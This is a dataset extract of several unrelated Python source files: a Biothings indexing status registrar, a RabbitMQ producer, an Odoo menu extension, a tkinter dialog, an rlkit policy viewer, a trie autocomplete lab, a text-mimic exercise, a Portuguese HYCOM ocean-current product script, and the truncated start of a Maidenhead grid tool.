test_merge_4():\n    x = {\"a\": {\"__REPLACE__\": True, \"b\": \"c\"}, \"__REPLACE__\": True}\n    y = {\"a\": {\"b\": \"d\"}}\n    merge(x, y)\n    
print(x)\n\nclass Stage(Enum):\n READY = 0\n STARTED = 1\n DONE = 2\n\n# an implementation like this should be further\n# generalized to replace utils.manager.BaseStatusRegisterer\n\nclass IndexJobStatusRegistrar():\n\n def __init__(self, indexer, collection):\n self.indexer = indexer\n self.collection = collection\n self.stage = Stage.READY\n self.t0 = 0\n\n @staticmethod\n def prune(collection):\n for build in collection.find():\n dirty = False\n for job in build.get(\"jobs\", []):\n if job.get(\"status\") == \"in progress\":\n logging.warning((\n \"Found stale build '%s', \"\n \"marking index status as 'cancelled'\"),\n build[\"_id\"])\n job[\"status\"] = \"cancelled\"\n job.pop(\"pid\", None)\n dirty = True\n if dirty:\n collection.replace_one({\"_id\": build[\"_id\"]}, build)\n\n def started(self, step=\"index\"):\n\n assert self.stage == Stage.READY\n self.stage = Stage.STARTED\n\n self.t0 = time.time()\n\n job = {\n \"step\": step,\n \"status\": \"in progress\",\n \"step_started_at\": datetime.now().astimezone(),\n \"logfile\": self.indexer.logfile,\n \"pid\": os.getpid()\n }\n self.collection.update(\n {\"_id\": self.indexer.target_name},\n {\"$push\": {\n \"jobs\": job\n }}\n )\n\n def failed(self, error):\n def func(job, delta_build):\n job[\"status\"] = \"failed\"\n job[\"err\"] = str(error)\n self._done(func)\n\n def succeed(self, **result):\n def func(job, delta_build):\n job[\"status\"] = \"success\"\n merge(delta_build, result)\n self._done(func)\n\n def _done(self, func):\n\n assert self.stage == Stage.STARTED\n self.stage = Stage.DONE\n\n build = self.collection.find_one({'_id': self.indexer.target_name})\n assert build, \"Can't find build document '%s'\" % self.indexer.target_name\n\n job = build[\"jobs\"][-1]\n job[\"time\"] = timesofar(self.t0)\n job[\"time_in_s\"] = round(time.time() - self.t0, 0)\n job.pop(\"pid\")\n\n delta_build = {}\n func(job, delta_build)\n merge(build, delta_build)\n self.collection.replace_one({\"_id\": build[\"_id\"]}, build)\n\nclass PreIndexJSR(IndexJobStatusRegistrar):\n\n def started(self):\n super().started('pre-index')\n\nclass MainIndexJSR(IndexJobStatusRegistrar):\n\n def started(self):\n super().started('index')\n\n def succeed(self, **result):\n\n # after finishing the inital indexing\n # save the index metadata to field \"index\"\n\n delta_build = {\n \"index\": {\n self.indexer.index_name: {\n '__REPLACE__': True,\n 'host': self.indexer.host,\n 'environment': self.indexer.env,\n 'conf_name': self.indexer.conf_name,\n 'target_name': self.indexer.target_name,\n 'index_name': self.indexer.index_name,\n 'doc_type': self.indexer.doc_type,\n 'num_shards': self.indexer.num_shards,\n 'num_replicas': self.indexer.num_replicas,\n 'created_at': datetime.now().astimezone()\n }\n }\n }\n merge(delta_build, result)\n super().succeed(**delta_build)\n\nclass PostIndexJSR(IndexJobStatusRegistrar):\n\n def started(self):\n super().started('post-index')\n\n\ndef test_registrar():\n from pymongo import MongoClient\n indexer = SimpleNamespace(\n host='localhost:9200',\n target_name=\"mynews_202012280220_vsdevjdk\", # must exists in DB\n index_name=\"__index_name__\",\n doc_type='news',\n num_shards=1,\n num_replicas=0,\n logfile='/log/file',\n conf_name='bc_news',\n env='dev'\n )\n collection = MongoClient().biothings.src_build\n IndexJobStatusRegistrar.prune(collection)\n\n # ----------\n # round 1\n # ----------\n\n job = MainIndexJSR(indexer, collection)\n\n input()\n job.started()\n input()\n job.failed(\"MockErrorA\")\n input()\n try:\n 
job.succeed()\n    except Exception as exc:\n        print(exc)\n\n    # ----------\n    # round 2\n    # ----------\n\n    job = MainIndexJSR(indexer, collection)\n\n    input()\n    job.started()\n    input()\n    job.succeed(index={\"__index_name__\": {\"count\": \"99\"}})\n\n    # ----------\n    # round 3\n    # ----------\n\n    job = PostIndexJSR(indexer, collection)\n\n    input()\n    try:\n        job.succeed()\n    except Exception as exc:\n        print(exc)\n\n    input()\n    job.started()\n\n    input()\n    job.succeed(index={\"__index_name__\": {\"additionally\": \"done\"}})\n\n\nif __name__ == '__main__':\n    test_registrar()\n","sub_path":"biothings/hub/dataindex/indexer_registrar.py","file_name":"indexer_registrar.py","file_ext":"py","file_size_in_byte":6635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"329240569","text":"import pika\n\nrmq_host = '192.168.99.100'\nrmq_port = '5672'\n\nconn_params = pika.ConnectionParameters(rmq_host, rmq_port)\nconnection = pika.BlockingConnection(conn_params)\n\nchannel = connection.channel()\n# A durable queue lets messages survive a RabbitMQ server crash or restart\nchannel.queue_declare(queue='hello',durable=True)\n# Also send the message with the persistent flag set\nchannel.basic_publish(exchange='',\n                      routing_key='hello',\n                      properties=pika.BasicProperties(\n                         delivery_mode = 2, # make message persistent\n                      ),\n                      body='Hello World!')\nprint(\" [x] Sent 'Hello World!'\")\nconnection.close()","sub_path":"prefetch_qos/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"305941965","text":"# -*- coding: utf-8 -*-\nfrom odoo import models\n\nclass IrUiMenu(models.Model):\n    _inherit = 'ir.ui.menu'\n\n    def get_needaction_data(self, ids):\n        \"\"\" Return for each menu entry of ids :\n            - if it uses the needaction mechanism (needaction_enabled)\n            - the needaction counter of the related action, taking into account\n              the action domain\n        \"\"\"\n        res = {}\n        for menu in self.browse(ids):\n            res[menu.id] = {\n                'needaction_enabled': False,\n                'needaction_counter': False,\n            }\n            if menu.action and menu.action.type in ('ir.actions.act_window', 'ir.actions.client') and menu.action.res_model:\n                if menu.action.res_model in self.env:\n                    obj = self.env[menu.action.res_model]\n                    if obj._needaction:\n                        if menu.action.type == 'ir.actions.act_window':\n                            dom = menu.action.domain and eval(menu.action.domain, {'uid': self.env.uid}) or []\n                        else:\n                            dom = eval(menu.action.params_store or '{}', {'uid': self.env.uid}).get('domain')\n                        res[menu.id]['needaction_enabled'] = obj._needaction\n                        res[menu.id]['needaction_counter'] = obj._needaction_count(dom)\n        return res","sub_path":"badge_menu/models/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"209730379","text":"import tkinter as tk\nfrom system.gui.widgets.factory import create_widget\nfrom system.gui.widgets.excel import Excel\n\n\nclass ManualLockView:\n    \n    def __init__(self, root_view, lock):\n        self.root_view = root_view\n\n        title = 'Lock Entries' if lock else 'Release Entries'\n        self.window = create_widget('toplevel', master=self.root_view.root, title=title)\n\n        self.widget = {}\n\n        frame_n_row = create_widget('frame', master=self.window, row=0, column=0, sticky=None, pady=0)\n        self.widget['disp_n_row'] = create_widget('labeled_entry',\n            master=frame_n_row, row=0, column=0, text='Number of rows', 
class_type='int')\n self.widget['set_n_row'] = create_widget('button', master=frame_n_row, row=0, column=1, text='Update')\n\n self.widget['rowid_excel'] = Excel(master=self.window, rows=1, columns=1, width=10, \n title=['Row number'], dtype=[int], default=None, required=[True], required_mark=False)\n self.widget['rowid_excel'].grid(row=1, column=0)\n\n frame_action = create_widget('frame', master=self.window, row=2, column=0, sticky=None, pady=0)\n self.widget['start'] = create_widget('button', master=frame_action, row=0, column=0, text='Lock' if lock else 'Release')\n self.widget['cancel'] = create_widget('button', master=frame_action, row=0, column=1, text='Cancel')","sub_path":"system/technician/manual_lock/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"423049039","text":"import torch\nimport numpy as np\nimport time\nimport pdb\nfrom rlkit.torch.policies.tanh_gaussian_policy import TanhGaussianPolicy\nfrom rlkit.torch.policies.make_deterministic import MakeDeterministic\nfrom rlkit.torch.policies.gumbel_softmax_policy import GumbelSoftmaxMlpPolicy\nfrom rlkit.policies.argmax import ArgmaxDiscretePolicy\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--exp_name', type=str, default='spread')\nparser.add_argument('--num_ag', type=int, default=2)\nparser.add_argument('--log_dir', type=str, default='MASAC')\nparser.add_argument('--epoch', type=int, default=None)\nparser.add_argument('--seed', type=str, default=0)\nargs = parser.parse_args()\n\npre_dir = './Data/'+args.exp_name+'_p'+str(args.num_ag)\nif args.epoch:\n\tdata_path = '{}/{}/seed{}/itr_{}.pkl'.format(pre_dir,args.log_dir,args.seed,args.epoch)\nelse:\n\tdata_path = '{}/{}/seed{}/params.pkl'.format(pre_dir,args.log_dir,args.seed)\ndata = torch.load(data_path,map_location='cpu')\npolicy_n = data['trainer/policy_n']\npolicy_n = [MakeDeterministic(policy) for policy in policy_n]\n\nenv_kwargs=dict(\n game_name=args.exp_name,\n agent_num=args.num_ag,\n)\nfrom particle_1d import Particle1D\nenv = Particle1D(**env_kwargs)\nnum_agent = env.agent_num\n\nwhile True:\n\to_n = env.reset()\n\ta_n = []\n\tfor (policy,o) in zip(policy_n,o_n):\n\t\ta, _ = policy.get_action(o)\n\t\ta_n.append(a)\n\to_n, r_n, done, _ = env.step(a_n)\n\tprint(\"a: \",a_n)\n\tprint(\"o: \",o_n)\n\tprint('r: ',r_n)\n\tprint(done)\n\tenv.render()\n\tpdb.set_trace()","sub_path":"tests/Particle1D/visualize_policy.py","file_name":"visualize_policy.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"273080274","text":"# NO IMPORTS!\n\nclass Trie:\n ##################################################\n ## basic methods\n ##################################################\n\n def __init__(self):\n self.frequency = 0\n self.children = {}\n\n # add word/frequency to the trie. Increment frequency\n # if no value supplied.\n def insert(self, word, frequency=None):\n if len(word) == 0:\n self.frequency += 1 if frequency == None else frequency\n else:\n self.children[word[0]] = self.children.get(word[0],Trie())\n self.children[word[0]].insert(word[1:],frequency)\n\n # return trie node for specified prefix, None if not in trie\n def find(self,prefix):\n if len(prefix) == 0:\n return self\n else:\n if prefix[0] in self.children:\n return self.children[prefix[0]].find(prefix[1:])\n else:\n return None\n\n # is word in trie? 
return True or False\n def __contains__(self, word):\n return bool(self.getFreq(word))\n\n # return list of [word,freq] pairs for all words in\n # this trie and its children\n def __iter__(self):\n return self.iterHelper()\n\n def iterHelper(self,extra=''):\n for i in self.children:\n yield from self.children[i].iterHelper(extra+i)\n if self.frequency != 0:\n yield [extra,self.frequency]\n \n ##################################################\n ## additional methods\n ##################################################\n\n # return the list of N most-frequently occurring words that start with prefix.\n def autocomplete(self, prefix, N):\n try:\n myNode = self.find(prefix)\n myList = [i for i in myNode.iterHelper(prefix)]\n myList.sort(key = lambda x: x[1],reverse = True)\n return [j[0] for j in myList[:N]]\n except AttributeError:\n return []\n \n \n # return the list of N most-frequent words that start with prefix or that\n # are valid words that differ from prefix by a small edit\n def autocorrect(self, prefix, N):\n try:\n myNode = self.find(prefix)\n if myNode == None:\n myList = []\n raise IndexError\n else:\n myList = [i for i in myNode.iterHelper(prefix)]\n myList.sort(key = lambda x: x[1],reverse = True)\n return [myList[j][0] for j in range(N)]\n except IndexError:\n print(myList)\n myCorr = [[i,self.getFreq(i)] for i in self.autoHelper(prefix) if (i in self and [i,self.getFreq(i)] not in myList)]\n myCorr.sort(key = lambda x: x[1],reverse = True)\n print(myCorr)\n myList = myList + myCorr\n print(myList)\n return [i[0] for i in myList[:N]]\n \n def getFreq(self,word):\n if len(word) == 0:\n return self.frequency\n else:\n if word[0] in self.children:\n return self.children[word[0]].getFreq(word[1:])\n else:\n return False\n\n def autoHelper(self,prefix):\n for i in 'abcdefghijklmnopqrstuvwxyz':\n for j in range(len(prefix)+1):\n yield prefix[:j] + i + prefix[j:]\n for k in range(len(prefix)):\n yield prefix[:k] + prefix[k+1:]\n for m in 'abcdefghijklmnopqrstuvwxyz':\n for n in range(len(prefix)):\n yield prefix[:n] + m + prefix[n+1:]\n if len(prefix) >= 2:\n for l in range(len(prefix)-1):\n yield prefix[:l] + prefix[l+1] + prefix[l] + prefix[l+2:]\n # return list of [word, freq] for all words in trie that match pattern\n # pattern is a string, interpreted as explained below\n # * matches any sequence of zero or more characters\n # ? 
matches any single character\n # otherwise char in pattern char must equal char in word\n def filter(self,pattern):\n myTransformed = self.splitterPattern(pattern)\n myList = []\n for i in self:\n if self.decider(myTransformed,i[0]):\n myList.append(i)\n return myList\n\n def decider(self,myList,word):\n newList = myList[:]\n myWord = word[:]\n if len(myList) == 0:\n return False if len(word) > 0 else True\n else:\n if myList[0] == \"*\":\n return any([self.decider(myList[1:],word[i:]) for i in range(len(word)+1)])\n elif myList[0] == \"?\":\n return self.decider(myList[1:],word[1:]) if len(word) > 0 else False\n else:\n if myList[0] == word[:len(myList[0])]:\n return self.decider(myList[1:],word[len(myList[0]):])\n else:\n return False\n\n\n def splitterPattern(self,pattern):\n myList = []\n myTemp = ''\n for i in range(len(pattern)):\n if pattern[i] == '*' or pattern[i] == '?':\n if myTemp != '':\n myList.append(myTemp)\n myTemp = pattern[i]\n myList.append(myTemp)\n myTemp = ''\n else:\n myTemp += pattern[i]\n if i == len(pattern)-1:\n myList.append(myTemp) \n return myList\n\n# handy stand-alone testing setup\nif __name__ == '__main__':\n # read in words\n import json # this import allowed as part of testing...\n with open('resources/words.json') as f:\n words = json.load(f)\n\n \"\"\"\n # small corpus: insert words one-by-one\n trie = Trie()\n for w in words[:50]: trie.insert(w)\n \"\"\"\n\n # large corpus: precompute count for each word\n trie = Trie()\n for w in set(words):\n trie.insert(w,words.count(w))\n\n # your test here!\n # Example: 5- or more letter words beginning in \"a\" and ending in \"ing\"\n #print(trie.filter('a?*ing'))\n","sub_path":"6.009/lab_7/lab.py","file_name":"lab.py","file_ext":"py","file_size_in_byte":5919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"641121855","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright 2010 Google Inc.\n# Licensed under the Apache License, Version 2.0\n# http://www.apache.org/licenses/LICENSE-2.0\n\n\"\"\"\nMimic exercise\n\nRead in the file specified on the command line.\nDo a simple split() on whitespace to obtain all the words in the file.\nRather than read the file line by line, it's easier to read it into\none giant string and split it once.\n\nNote: the standard python module 'random' includes a random.choice(list)\nmethod which picks a random element from a non-empty list.\n\nYou can try adding in line breaks around 70 columns so the output looks\nbetter.\n\"\"\"\n\n__author__ = \"Chris Warren with help from Cheria Artis, Tiffany McLean, Piero Madar, & Stack Overflow\"\n\nimport random\nimport sys\n\ndef create_mimic_dict(filename):\n \"\"\"\n Returns a dict mapping each word to a list of words which follow it.\n For example:\n Input: \"I am a software developer, and I don't care who knows\"\n Output:\n {\n \"\" : [\"I\"],\n \"I\" : [\"am\", \"don't\"],\n \"am\": [\"a\"],\n \"a\": [\"software\"],\n \"software\" : [\"developer,\"],\n \"developer,\" : [\"and\"],\n \"and\" : [\"I\"],\n \"don't\" : [\"care\"],\n \"care\" : [\"who\"],\n \"who\" : [\"knows\"]\n }\n \"\"\"\n mimic_dict = {}\n with open(filename, 'r') as file:\n text = file.read()\n words = text.split()\n prev_word = ''\n for word in words:\n if prev_word not in mimic_dict:\n mimic_dict[prev_word] = [word]\n else:\n mimic_dict[prev_word].append(word)\n prev_word = word \n print (len(mimic_dict.keys()))\n\n return mimic_dict\n\ndef print_mimic(mimic_dict, start_word):\n \"\"\"\n Given a 
previously created mimic_dict and start_word,\n prints 200 random words from mimic_dict as follows:\n - Print the start word\n - Look up the start word in your mimic_dict and get its next-list\n - Randomly select a new word from the next-list\n - Repeat this process 200 times\n \"\"\"\n start_word = random.choice(list(mimic_dict.keys()))\n for i in range(200):\n print(start_word, end= \" \")\n next_word_list = mimic_dict.get(start_word)\n if next_word_list is None:\n next_word_list = mimic_dict[\"\"]\n start_word = random.choice(next_word_list)\n \ndef main():\n if len(sys.argv) != 2:\n print('usage: python mimic.py file-to-read')\n sys.exit(1)\n\n d = create_mimic_dict(sys.argv[1])\n print_mimic(d, '')\n\nif __name__ == '__main__':\n main()","sub_path":"mimic.py","file_name":"mimic.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"14024175","text":"#!/home/operador/anaconda3/envs/auxdechycom/bin/python\n# -*- coding: utf-8 -*-\n# -*- coding: iso-8859-1 -*-\n#\n# Esta rotina eh a rotina-mae dos auxilios-a-decisao do HYCOM.\n#\n# Tres rotinas sao chamadas, dependendo do que for solicitado:\n#\n# 1. corrente_hycom.py:\n# Chama rotinas que fazem figuras de campos de corrente\n# horizontal em diferentes niveis verticais.\n#\n# 2. cvert_hycom.py:\n# Faz secoes transversais de corrente horizontal centrada\n# em lat/lon pre-definida.\n#\n# 3. txts_hycom1.py:\n# Chama rotinas que fazem arquivos de texto com dados das\n# correntes horizontais em diferentes niveis verticais.\n# IMPORTANTE: há tres arquivos, a saber:\n# - txts_hycom1.py: uma rotina, chamada por este script.\n# - txts_hycom2.txt: nao eh uma rotina. Ler e seguir suas\n# instrucoes.\n# - txts_hycom3.py: uma rotina a ser executada manualmente.\n#\n# Informacoes adicionais referentes destes produtos podem ser\n# encontrados nos cabecalhos das rotinas listadas acima.\n#\n# Autor: 1T (T) THALLES\n# Data: 29ABR2018\n# Ultima atualizacao: 08MAI2019\n\n# ------------------------------------------------------------>\n# IMPORTACAO DE BIBLIOTECAS E DEFINICAO DE DIRETORIOS:\n\n# Bibliotecas utilizadas:\nimport os\nimport numpy as np\nimport sys\n\n# Diretorios-chave (somente altera-los caso eles mudem):\ndirlocal = '/home/operador/AuxDec_HYCOM'\ndirpython = '/home/operador/anaconda3/envs/auxdechycom/bin/python'\n\n# ============================================================>\n# DATA DA RODADA DO HYCOM A SER UTILIZADA:\n\nif (len(sys.argv)-1 != 1):\n print('')\n print('+-------------------------------------------------------+')\n print('| |')\n print('| Insira a data de rodada do HYCOM na forma AAAAMMDD. |')\n print('| Exemplo: ./auxdec_hycom.py 20190618 |')\n print('| |')\n print('+-------------------------------------------------------+')\n print('')\n\nano = str(sys.argv[1][0:4])\nmes = str(sys.argv[1][4:6])\ndia = str(sys.argv[1][6:8])\n\n# ============================================================>\n# --- INICIO DA EDICAO DA ROTINA POR PARTE DO USUARIO -------->\n# ============================================================>\n\n# ============================================================>\n# PARTE 1 DE 4: lista de produtos a serem gerados:\n\n# Preencha abaixo conforme os produtos que estejam sendo\n# solicitados. 
Insira 'SIM' ou 'NAO', entre aspas simples.\n\n# Correntes horizontais (corrente_hycom.py):\ncorrente = 'SIM' # Caso SIM, \"auxdec_hycom.py\" executara\n # \"corrente_hycom.py\".\n\n# Cortes verticais (cvert_hycom.py):\ncvert = 'NAO' # Caso SIM, \"auxdec_hycom.py\" executara\n # \"cvert_hycom.py\".\n\n# Arquivos de texto .txt (txts_hycom1.py):\ntxts = 'NAO' # Caso SIM, \"auxdec_hycom.py\" executara\n # \"txts_hycom1.py\".\n # IMPORTANTE: apos execucao de \"txts_hycom1.py\",\n # siga as instrucoes de \"txts_hycom2.txt\" e, apos,\n # execute \"txts_hycom3.py\".\n\n# Apos, preencha:\n# - os dados comuns a todos os produtos (PARTE 2 DE 5),\n# - os dados referentes aos produtos solicitados\n# (PARTE 3 DE 5 e/ou PARTE 4 DE 5 e/ou PARTE 5 DE 5).\n\n# ============================================================>\n# PARTE 2 DE 4: correntes horizontais (corrente_hycom.py):\n\n# Nome do evento (sera o titulo das figuras):\nnome = 'Modulos' # Nao utilizar espacos!\n\n# Resolucao do HYCOM:\nresHYCOM = '1/24' # '1/4', '1/12' ou '1/24'.\n\n# Area de interesse para a geracao da figura:\nlat_sul = '-26.8' # Latitude mais a sul.\nlat_norte = '-25.2' # Latitude mais a norte.\nlon_oeste = '-48.8' # Longitude mais a oeste.\nlon_leste = '-47' # Longitude mais a leste.\n\n# Pontos de interesse (e.g. local do evento, cidades de referencia):\npNome1 = 'Módulos' # Nome ponto 1 (evento).\nplon1 = -47.59 # Lon ponto 1 (evento).\nplat1 = -26.04 # Lat ponto 1 (evento).\npNome2 = 'São Francisco do Sul' # Nome ponto 2 (cidade referencia).\nplon2 = -48.51 # Lon ponto 2 (cidade referencia).\nplat2 = -26.23 # Lat ponto 2 (cidade referencia).\npNome3 = 'Ilha do Mel' # Nome ponto 3 (outra cidade referencia).\nplon3 = -48.31 # Lon ponto 3 (outra cidade referencia).\nplat3 = -25.52 # Lat ponto 3 (outra cidade referencia).\n\n# Temos que as lat/lon extremas do HYCOM sao:\n# HYCOM 0.25 (i.e. HYCOM 1/4) \n# lonming=-98.0\n# lonmaxg=21.0\n# latming=-78.0\n# latmaxg=50.0\n# HYCOM 0.08 (i.e. HYCOM 1/12) \n# lonming=-68.0\n# lonmaxg=-18.0\n# latming=-45.0\n# latmaxg=10.0\n# HYCOM 0.04 (i.e. HYCOM 1/24)\n# lonming=-54.0\n# lonmaxg=-32.0\n# latming=-34.0\n# latmaxg=-12.0\n\n# Quantidade de prognósticos desejados (saidas horarias):\nprog='97' # Previsao de [analise] ate [analise+(XX+1)].\n\n# Densidade de vetores:\nskip = int('1') # Quantidade de pontos entre vetores.\n# OBS: quanto maior o zoom menor o skip.\n# OBS: atencao ao parâmetro \"scale\" do tamanho do vetor (L139).\n\n# ============================================================>\n# PARTE 3 DE 4: cortes verticais (cvert_hycom.py):\n\n# Mes da rodada do HYCOM a ser utilizada:\nmes_str = 'JUN' # 'JAN', 'FEV', 'MAR', ...\n\n# Dia da semana do dia da rodada:\ndia_sem = 'quinta-feira'\n\n# Latitude e longitude exata do ponto em questão:\n# (Nao eh um string! 
Valores em graus decimais!)\n# (Nao precisa ser coincidente com um no de calculo do\n# modelo.)\nlat_evento = -26.04 # Em graus decimais.\nlon_evento = -47.59 # Em graus decimais.\n\n# Nome do evento (para titulo das figuras):\nlocalidade = 'Módulos'\n\n# Valores delta_lat e delta_lon, para definir a largura das\n# imagens.\n# Dica: para vortices oceanicos de mesoescala, valores bons\n# estao entre 1 e 3.\n# Nota: o corte N-S ira de\n# [lat_evento - delta_lat] até [lat_evento + delta_lat].\n# Nota: o corte L-O ira de\n# [lon_evento - delta_lon] até [lon_evento + delta_lon].\ndelta_lat = 2 # Em graus; nao eh um string!\ndelta_lon = 2 # Em graus; nao eh um string!\n\n# Profundidade maxima a ser exibida nas secoes transversais:\nmax_prof = 100 # Em metros; nao eh um string!\n\n# ============================================================>\n# PARTE 4 DE 4: arquivos de texto .txt (txts_hycom1.py):\n\n# Nesta parte, preencha tudo com aspas simples!\n\n# Hora da previsao:\nHH = '00' # '00' ou '12'.\n\n# Longitude minima (vide limites abaixo!):\nlonmin = '-48'\n# Longitude maxima (vide limites abaixo!):\nlonmax = '-47'\n# Latitude minima (vide limites abaixo!):\nlatmin = '-27.5'\n# Latitude maxima (vide limites abaixo!):\nlatmax = '-25.5'\n\n# Profundidade minima (em metros):\nprofmin = '1'\n# Profundidade maxima (em metros):\nprofmax = '100'\n# Intervalo de profundidade (em metros):\ndeltaprof = '10' # Isto eh, um dado a cada quantos metros?\n\n# Quantidade de dias de previsao:\n#dias_prev = 4 # Se 1, prog ira ate 24.\n # Se 2, prog ira ate 48.\n # Se 3, prog ira ate 72.\n # Se 4, prog ira ate 96.\n\n# ------------------------------------>\n# LAT E LON MINIMAS E MAXIMAS EM GRAUS:\n#\n# HYCOM 1/4 DE GRAU (0.25 GRAUS)\n# lonming=-98.0\n# lonmaxg=21.0\n# latming=-78.0\n# latmaxg=50.0\n# HYCOM 1/12 DE GRAU (0.08 GRAUS)\n# lonming=-68.0\n# lonmaxg=-18.0\n# latming=-45.0\n# latmaxg=10.0\n# HYCOM 1/24 DE GRAU (0.04 GRAUS)\n# lonming=-54.0\n# lonmaxg=-32.0\n# latming=-34.0\n# latmaxg=-12.0\n# ------------------------------------>\n\n# ============================================================>\n# --- FIM DA EDICAO DA ROTINA POR PARTE DO USUARIO ----------->\n# ============================================================>\n\n# ============================================================>\n# DEFINICAO DE DIRETORIO DOS DADOS DO HYCOM:\n\nif resHYCOM == '1/24':\n dirdados = '/mnt/nfs/dpns32/data1/operador/previsao/hycom_2_2/output/Previsao_1_24/Ncdf'\nelif resHYCOM == '1/12':\n dirdados = '/mnt/nfs/dpns32/data1/operador/previsao/hycom_2_2/output/Previsao_1_12/Ncdf'\nelif resHYCOM == '1/4':\n dirdados = '/mnt/nfs/dpns32/data1/operador/previsao/hycom_2_2/output/Previsao_1_4/Ncdf'\n\n# ============================================================>\n# CALCULO DO INSTANTE DE PROGNOSTICO FINAL:\n\n# Ano final da previsao:\n#ano_final = str((datetime(int(ano),int(mes),int(dia)) + timedelta(days=dias_prev)).year).zfill(4)\nano_final = ano\n\n# Mes final da previsao:\n#mes_final = str((datetime(int(ano),int(mes),int(dia)) + timedelta(days=dias_prev)).month).zfill(2)\nmes_final = mes\n\n# Dia final da previsao:\n#dia_final = str((datetime(int(ano),int(mes),int(dia)) + timedelta(days=dias_prev)).day).zfill(2)\ndia_final = dia\n\n# ============================================================>\n# SALVANDO DADOS FORNECIDOS PELO USUARIO:\n\n# Lista de variaveis a serem salvas:\n# (Os comentarios representam os produtos que as utilizam.)\ndados = {\n 'ano': ano, # corrente, cvert, txts.\n 'mes': mes, # corrente, cvert, 
txts.\n 'dia': dia, # corrente, cvert, txts.\n 'nome': nome, # corrente.\n 'resHYCOM': resHYCOM, # corrente.\n 'lat_sul': lat_sul, # corrente.\n 'lat_norte': lat_norte, # corrente.\n 'lon_oeste': lon_oeste, # corrente.\n 'lon_leste': lon_leste, # corrente.\n 'pNome1': pNome1, # corrente.\n 'plon1': plon1, # corrente.\n 'plat1': plat1, # corrente.\n 'pNome2': pNome2, # corrente.\n 'plon2': plon2, # corrente.\n 'plat2': plat2, # corrente.\n 'pNome3': pNome3, # corrente.\n 'plon3': plon3, # corrente.\n 'plat3': plat3, # corrente.\n 'prog': prog, # corrente.\n 'skip': skip, # corrente.\n 'mes_str': mes_str, # cvert.\n 'dia_sem': dia_sem, # cvert.\n 'lat_evento': lat_evento, # cvert.\n 'lon_evento': lon_evento, # cvert.\n 'localidade': localidade, # cvert.\n 'delta_lat': delta_lat, # cvert.\n 'delta_lon': delta_lon, # cvert.\n 'max_prof': max_prof, # cvert.\n 'HH': HH, # txts.\n 'lonmin': lonmin, # txts.\n 'lonmax': lonmax, # txts.\n 'latmin': latmin, # txts.\n 'latmax': latmax, # txts.\n 'profmin': profmin, # txts.\n 'profmax': profmax, # txts.\n 'deltaprof': deltaprof, # txts.\n 'ano_final': ano_final, # txts.\n 'mes_final': mes_final, # txts.\n 'dia_final': dia_final # txts.\n}\n\n# Salvando os dados:\nnp.save((dirlocal+'/dados_usuario'), dados)\n\n# ============================================================>\n# IMPORTANDO DADOS DO HYCOM CASO NECESSARIO:\n\n# Os dados serao importados somente caso eles NAO existam no\n# diretorio AuxDec_HYCOM.\n\n# If para baixar os dados somente caso os produtos desejados\n# contemplem \"corrente\" ou \"cvert\" (pois \"txts\" nao utilizam\n# os resultados em NetCDF):\n\n#if (cvert == 'SIM'):\n#\n# string = dirlocal+'/DadosHYCOM/HYCOM_MV_'+ano+mes+dia+'.nc'\n#\n# if (os.path.isfile(string) == False):\n# # Apagando dados antigos:\n# os.system('rm '+dirlocal+'/DadosHYCOM/HYCOM_MV_*_nc')\n# # String do comando:\n# print('Insira a senha de \"operador@10.13.100.31\":')\n# string = 'scp operador@10.13.100.31:' + dirdados + '/' + ano+mes+dia + '/HYCOM_MV_' + ano+mes+dia + '.nc ' + dirlocal + '/DadosHYCOM'\n# # Importacao do dado propriamente dita:\n# os.system(string)\n\n# ============================================================>\n# RODANDO AS ROTINAS DE CONFECCAO DOS AUXILIO-A-DECISAO:\n\n# Fazendo diretorio final das figuras:\nos.system('mkdir '+dirlocal+'/Produtos/'+ano+mes+dia)\n\n# Rodada de corrente_hycom.py:\nif (corrente == 'SIM'):\n os.system(dirpython+' '+dirlocal+'/corrente_hycom/corrente_hycom.py')\n\n# Rodada de cvert_hycom.py:\nif (cvert == 'SIM'):\n os.system(dirpython+' '+dirlocal+'/cvert_hycom/cvert_hycom.py')\n\n# Rodada de txts_hycom1.py:\nif (txts == 'SIM'):\n os.system(dirpython+' '+dirlocal+'/txts_hycom/txts_hycom1.py')\n\n# ============================================================>\n\n","sub_path":"AuxDec_HYCOM/auxdec_hycom.py","file_name":"auxdec_hycom.py","file_ext":"py","file_size_in_byte":11944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"24047364","text":"#!/usr/bin/env python\nimport maidenhead\nfrom argparse import ArgumentParser\nimport sys\n\n\ndef main():\n p = ArgumentParser()\n p.add_argument(\"loc\", help=\"Maidenhead grid or lat lon\", nargs=\"+\")\n p.add_argument(\"-p\", \"--precision\", help=\"maidenhead precision\", type=int, default=3)\n p.add_argument(\"-u\", \"--url\", help=\"also output Google Maps URL\", action=\"store_true\")\n p = p.parse_args()\n\n if len(p.loc) == 1: # maidenhead\n maiden = p.loc[0]\n lat, lon = maidenhead.toLoc(maiden)\n 
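# A hand-worked sketch of how the first two Maidenhead pairs decode (the
# library handles the finer pairs): letters A-R split longitude into 18
# fields of 20 degrees and latitude into 18 fields of 10 degrees, counted
# from (-180, -90); the digit pair then picks a 2 x 1 degree square.
# E.g. 'JN58' -> lon = (ord('J') - ord('A')) * 20 - 180 + 5 * 2 = 10,
#                lat = (ord('N') - ord('A')) * 10 - 90 + 8 * 1 = 48.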
